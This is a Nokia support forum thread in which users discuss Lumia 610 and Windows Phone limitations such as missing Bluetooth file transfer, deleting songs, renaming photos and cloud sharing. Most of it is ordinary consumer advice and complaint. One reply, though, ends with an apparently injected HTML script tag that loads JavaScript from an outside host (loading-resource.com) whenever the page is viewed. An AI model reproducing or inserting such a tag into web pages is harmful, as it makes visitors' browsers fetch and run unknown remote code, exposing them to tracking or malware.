Search Discussions:
Showing results for 
Search instead for 
Do you mean 
Advanced Search...
Welcome to Nokia Support Discussions! Here you can share advice and tips with thousands of other Nokia users around the world in English. Many Nokia employees also follow and participate in the discussions, see our guidelines for more information. Everyone can search and read the discussions, but to post your own question or reply to others, simply sign in with your Nokia account. If this is your first time here, you can choose an alias to represent you. And if you don't have a Nokia account yet, please register.

[ask] need clarify, Lumia 610 features

Contributor
mingjae

[ask] need clarify, Lumia 610 features

hi, good evening here..

previously, i badly interested in android phones till i see the living tiles and the design of Nokia Lumia 610,

very smooth, stylish UI, and beautiful design..

but i heard some issues that many disadvantages will get from a windows phone,

and i post here ask if the issues were hoax or just true in Lumia 610:

1.lumia 610 cannot zoom in or out in photo or video mode using volume+/- button

2.cannot transfer files via bluetooth but nfc,

if that is true, how to transfer files to friend's notebook?

3.cannot delete mp3 songs from phone,

then I need to do it with PC?

4.cannot rename photos name,

again, i need a PC contact to get a file renamed?

just need clarify before get this phone..

thx

Please use plain text.
Counsellor
ProfJulie

Re: [ask] need clarify, Lumia 610 features

1.  You don't use a button to zoom in or out on pictures, you touch the screen to zoom in or out when viewing pictures; there are controls on the screen you can use to zoom in or out when taking pictures

2.  No bluetooth file transfer.....instead you can email files or upload files to the cloud and share links to files with friends

3. Deleting songs on the phone can be done by pressing & holding finger on the phone and selecting Delete from popup menu (many things are deleted in this fashion on the phone)

4. Cannot rename photos on the phone, but there are third party applications in the windows phone marketplace that let you name pictures.

Microsoft MVP Windows Phone Consumer
Please use plain text.
Contributor
mingjae

hi,

thx for u'r reply :smileyhappy:

so 3/4 points up there was true?

uhm, without bluetooth files transfer capability it is more uncomfortable for me.. :smileysad:

and may i ask some more question?

-some says, this phone cannot create playlist on the phone and do not have music duration bar?

so i cannot skip a song to the reff only, is that true?

-and i cannot download anything using phone browser exept from market,

so if my friend share a mediafire link on facebook uploading her holiday photo i can not downloading it?

I sees many lumia 610 review video on utube, this phone attract me so much so i cant handle it,

but so many issues there.. :smileysad:

i need u'r help 610 users.. thx

Please use plain text.
Counsellor
ProfJulie

The philosophy behind windows phone is that files are stored in the cloud (SkyDrive) and then they can be easily shared by sharing links via email or text message.  If you align yourself with that philosophy there is no real need for a bluetooth file transfer (which I always found too time consuming to use so never used much on my older devices).  If your files are stored in the cloud, then you can share a link with anyone and that person can download the file at their convenience.

You can create playlists on windows phone (I'm actually writing a blog post now that describes exactly how to do this).  There isn't a duration bar, but you can easily swipe left or right to move through the songs in the playlist.

If someone shares a link to a file with you, you can click on the link to view the file.  You can only install applications to a phone that are in the marketplace.

Please use plain text.
Mobile Guru
93tid

ProfJulie wrote:

If you align yourself with that philosophy there is no real need for a bluetooth file transfer 

However if you align yourself with the philosophy that the sender might not wish to use his expensive data allowance to upload the file and the receiver might not wish to have to download it over a data connection for the same reason you might find yourself facing a totally different philosophical paradigm. If people keep constantly asking about this feature maybe Microsoft should take notice instead of trying to force the cloud-only approach down the throats of not-so-willing customers.

Please use plain text.
Counsellor
ProfJulie

[ Edited ]

People have been asking for bluetooth file transfer ever since windows phones were released (almost 2 years ago).  There hasn't been any comment or indication that Microsoft plans to implement this any time soon. 

Sharing links via email or text enables the receiver of such link to download the file at their convenience, which means if they don't want to use a data connection they could download the file when they have access to wifi or even from their computer.

Instead of waiting around hoping for a change that may never happen (and certainly isn't going to happen any time soon), you could go back to using an old phone or you could find another way to do what you want to do...for me, sharing links is as good or better than transferring files via bluetooth, but if you're really stuck on bluetooth file transfer and if that's a deal breaker for you in terms of getting a mobile phone, then you're probably not going to be satisfied with a windows phone.

Please use plain text.
Professor
KennyKB

ProfJulie wrote:

Sharing links via email or text enables the receiver of such link to download the file at their convenience, which means if they don't want to use a data connection they could download the file when they have access to wifi or even from their computer.

Some users want to share files with each other when they are physically nearby so bluetooth file transfer comes in useful here. Having to upload to a cloud and have the receiver download it is so lame instead of the ability to make a direct transfer. Not everybody have data connection on the go.

Please use plain text.
Contributor
mingjae

so no duration bar on a 'now playing' song?

uhmm..

and yes, windows phone maybe not suitable for me, coz i only have a good wi-fi connection in my house or at school, and besides that places i should use gsm 3G from my local operator network which much slower :smileysad:

but truly, i was compare this phone from many reviews, this phone has extremely fast and super smooth browsing capability than any other phone!

and about the bluetooth,

thats what im talking about, if i hike to a mountain for take a photograph with my friend,

no signal from any gsm operator, no wi-fi connection and my battery remain 8%,

if my phone have an important files and my friend phone has 60% battery remains,

i have to transfer my files to my friends phone to her notebook, so i need at least a removable memory card or a bluetooth connection... :smileysad:

Please use plain text.
Advisor
Leo2306

I am a victim of having NOKIA LUMIA 610 and facing so called cloud philosophy of  Windows Mobile.

When I received lumia 610, i was amazed of its UI and its intuitiveness.

But it was upto 2 days. For 2 days I was using wifi connection at my home and office and busy after downloading various applications and games.

After 2 days, i had activated 3g plan and from that time this phone becomes curse for me.

I was not able to access internet from Lumia 610.  I checked my 3G card in a 3G dongle and it was working awesome but in lumia 610, I was unable to open even single site. I had posted the same issue in Nokia Forum bu still no satisfied answer is received.

http://discussions.nokia.com/t5/Connectivity/Lumia-610-Data-Connection-Issue-GPRS/m-p/1502708/highli...

On the same day i was playing a song from mix radio and my wife asked me to have that song in her mobile. I downloaded it from mix radio and search the option to send it over Bluetooth. It was Nokia WP ureka... I spend  more than an hour to find the option to send music files via Bluetooth but not found any :smileysurprised:. What  a **bleep**.

Soon it gives me another shock that all the contact details in my phone was getting sync with my windows live account. So, all the private numbers were getting uploaded to my account and there was no option to stop it.:smileysurprised:. I don't want my personal contact number to be uploaded  on internet. Again a **bleep**.

One more shock i got when i found that Angrybirds and Skype was not supported in Lumia 610. Even I don't get any VoIP application like 3CX phone or Bria phone on market for internet calling for Lumia 610. So, can't use my SMART PHONE as my extension phone even though my company provides WiFi connectivity and in-house VoIP EPBX.:smileyfrustrated: Again a **bleep**.

Another thing I found that there is no sound profiles in lumia 610. There is separate Flight Mode only. What if only want to switch it  to vibration mode and don't want my internet connectivity to be stopped? Go to settings then tab on ringtones+sounds then turn off ringer. There is even no facility to pin the ringtones+sounds on start-up screen. What a shortcut, mind-blowing:smileyfrustrated:.

lets go one step further, it is not allowing to set ringtones other than provided in phone (I had not yet found any 3rd party application for lumia 610 which can allow it). Its crazy.:smileyfrustrated:

There are so many such little things in phone which creates frustration while using it. 

These UI, intuitiveness, cloud concepts, etc., is good till you have proper internet connectivity. But when you try to use it as a phone in daily routine, you will face a new frustration  each time.

Boss, this phone will fall on his face in Indian market if you consider users rather than buyers, satisfaction rather than sales.

I am a Nokia fan as with Nokia I always find reliability and satisfaction. I had gifted various Nokia handsets to my family members. But this time I failed to choose one for me.:smileysad:

I have spent 12.5k rs behind this **bleep** and now, I am going to replace it with any Android one as all so called Cloud facility is also available in it, but other manufacturers have taken care of such little things also.

Please use plain text.
Professor
caitlin1759

Cloud is brilliant for what it does but so is Bluetooth. Don't understand the philosophy of Windowsof refusing to include a tiny piece of software which would have the effect of making Windows phones compatible for file transfer with just about every other phone. But so be it.

Also if Bluetooth is so passe why does Windows 8 feature Near Field Communication, which as far as I can see does exactly what Bluetooth or going back further, infrared, does.
Please use plain text.
Professor
KennyKB

The Cloud concept works well for countries where data is cheap, fast, reliable, covers all areas and practically every user has a data plan. Users in developing countries still depend on bluetooth. WP has been designed for users in rich Western countries and will not be a success in developing countries no matter how cheap Nokia makes it.
Please use plain text.
Registered Member
gorvlal

but what we do in case of 100mb files .

ProfJulie wrote:

The philosophy behind windows phone is that files are stored in the cloud (SkyDrive) and then they can be easily shared by sharing links via email or text message.  If you align yourself with that philosophy there is no real need for a bluetooth file transfer (which I always found too time consuming to use so never used much on my older devices).  If your files are stored in the cloud, then you can share a link with anyone and that person can download the file at their convenience.

You can create playlists on windows phone (I'm actually writing a blog post now that describes exactly how to do this).  There isn't a duration bar, but you can easily swipe left or right to move through the songs in the playlist.

If someone shares a link to a file with you, you can click on the link to view the file.  You can only install applications to a phone that are in the marketplace.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Please use plain text.
Registered Member
zozo261

Music can't be deleted even when I press down the on the song I want to delete. When I press down on the selected song I want to delete, what comes out are two options: add to now playing and pin to start, so then how do we really delete music??

Please use plain text.
Professor
JackMerson

@gorvial To avoid losing data plan for let say, 100 MB file, you can use Wifi to download it. And, if you don't have Wifi network on your home, you can go to a Cafe (With a Wifi) and connect it. There are much cafe or restaurant with Wifi.

@zoo261 You can go to Music And Videos instead of Nokia Music and delete it from there. I remember that there's an option to do so. If I am wrong, then probably I forgot where to delete the songs. I will try to post another message since I am not with my Lumia right now.
You can also delete it from PC (With Zune).
If I have helped you in any way, give me a kudos! :smileyhappy:
Please use plain text.
Registered Member
Raghuvarun

Its really an Awesome phone,But with lots of dis-advantages,no blutooth transfers,incompatabilities with some famous applications,poor music quality,not user friendlyness,:Cool,Even am suffering with above mentioned features,I still not understanding why nokia is not taking care about all these features,If the above mentioned features are implemented i hope this lumia 610 will rock in the market....

Please use plain text.
Professor
JackMerson

Sorry, Raghuvarun. The restrictions of Windows phone is not secret and people know much about it. Bluetooth transfer is on the way in new update though.
If I have helped you in any way, give me a kudos! :smileyhappy:
Please use plain text.
Registered Member
amancool

I m not able to download songs from Nokia music....i have Nokia lumia 510 .it shows I am already registered to Nokia music unlimited subscription
Please use plain text.
Registered Member
sam1989

I bought a Lumia 610 and its totally crab. even cant share files of my frnd. if u i dont have a PC right know and i need to share some thimg then wat wil i do. other than Email suggest plzzzz

Please use plain text.
Mobile Overlord
cjlim

You can upload to Skydrive and share the link. Also, bluetooth media file sharing should be available with the next update to WP7.8

Please use plain text.
Registered Member
sam1989

I tried to delete the songs by pressing & holding finger but it only show pop up to pin to start menu. Plzzz can u say me how can i delete my songs from Lumia 610
Please use plain text.